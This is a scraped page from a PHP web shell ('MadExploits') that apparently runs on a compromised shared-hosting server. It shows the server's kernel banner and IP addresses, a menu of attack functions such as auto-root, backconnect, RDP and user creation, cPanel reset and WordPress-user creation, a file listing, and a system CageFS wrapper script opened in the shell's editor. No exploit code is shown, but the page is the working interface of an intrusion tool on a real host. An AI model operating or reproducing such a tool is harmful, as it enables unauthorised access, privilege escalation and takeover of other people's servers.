Linux server257.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 185.61.153.106 | : 216.73.216.211
Cant Read [ /etc/named.conf ]
8.1.33
safeqmlm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
.build-id /
7d /
[ HOME SHELL ]
Name
Size
Permission
Action
09842a66a98d6b958d829683fde9f1...
11.53
KB
-rwxr-xr-x
12207b4fa9e2abafe8838b7882713c...
12.04
KB
-rwxr-xr-x
14cfa4ee9b6303c12a203772fee7ad...
71.78
KB
-rwxr-xr-x
3e1cae1d440a68752d98351c5644e0...
44.62
KB
-rwxr-xr-x
5c29fa38fe672cc7e869f0c4dc89f3...
11.96
KB
-rwxr-xr-x
8d0720d8812063e3f5a9260f149397...
23.8
KB
-rwxr-xr-x
93f76b6e1b8a4191976d031c536700...
8.02
KB
-rwxr-xr-x
9b35cc35b4e8aa33b231b7e352daaa...
12.54
KB
-rwxr-xr-x
9cb53cbca4b38edad3c61bc164f852...
22.92
KB
-rwxr-xr-x
ba851e7d6c6fbbe0b610dcb6e64d96...
11.53
KB
-rwxr-xr-x
cc9e7db2b8c99cefc24f5ff8c5451a...
28.8
MB
-rwxr-xr-x
da3f76cb27ec7d4e10b8640d1a910b...
1.03
KB
-rwxr-xr-x
dd33c98fd98c1e5f40036359a90e39...
2.26
MB
-rwxr-xr-x
e980101012f161086553168cbf86d5...
11.6
KB
-rwxr-xr-x
f78d9cf4e8c5a9b010e162f16950da...
188.68
KB
-rwxr-xr-x
fa393b44974561ebd6e5d77a909dc8...
11.48
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : da3f76cb27ec7d4e10b8640d1a910b4d8f2e99
#!/bin/bash ##CageFS proxyexec wrapper - ver 16 if [[ $EUID -eq 0 ]]; then echo 'Cannot be run as root' exit 1 fi USR=`/usr/bin/whoami` TOKEN=`/bin/cat /var/.cagefs/.cagefs.token` # It's user's tmp directory and write to it is secure procedure # because this script is running only under usual user PIDFILE="/tmp/.cagefs.proxy.$$" USER_INTERRUPT=13 CWD=`pwd` ctrl_c_handler() { if [[ -f "$PIDFILE" ]]; then pid=`/bin/cat $PIDFILE` /bin/rm -f $PIDFILE > /dev/null 2>&1 /bin/kill -s SIGINT "$pid" > /dev/null 2>&1 fi exit $USER_INTERRUPT } if [[ -e /var/.cagefs/origin ]]; then ORIGIN=`/bin/cat /var/.cagefs/origin` REMOTE="/usr/bin/ssh -F /etc/ssh/cagefs-rexec_config $USR@$ORIGIN" $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" USERDOMAINS $$ "$@" RETVAL=$? else trap 'ctrl_c_handler' 2 CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock "$USR" "$CWD" USERDOMAINS $$ "$@" RETVAL=$? /bin/rm -f $PIDFILE > /dev/null 2>&1 fi exit $RETVAL
Close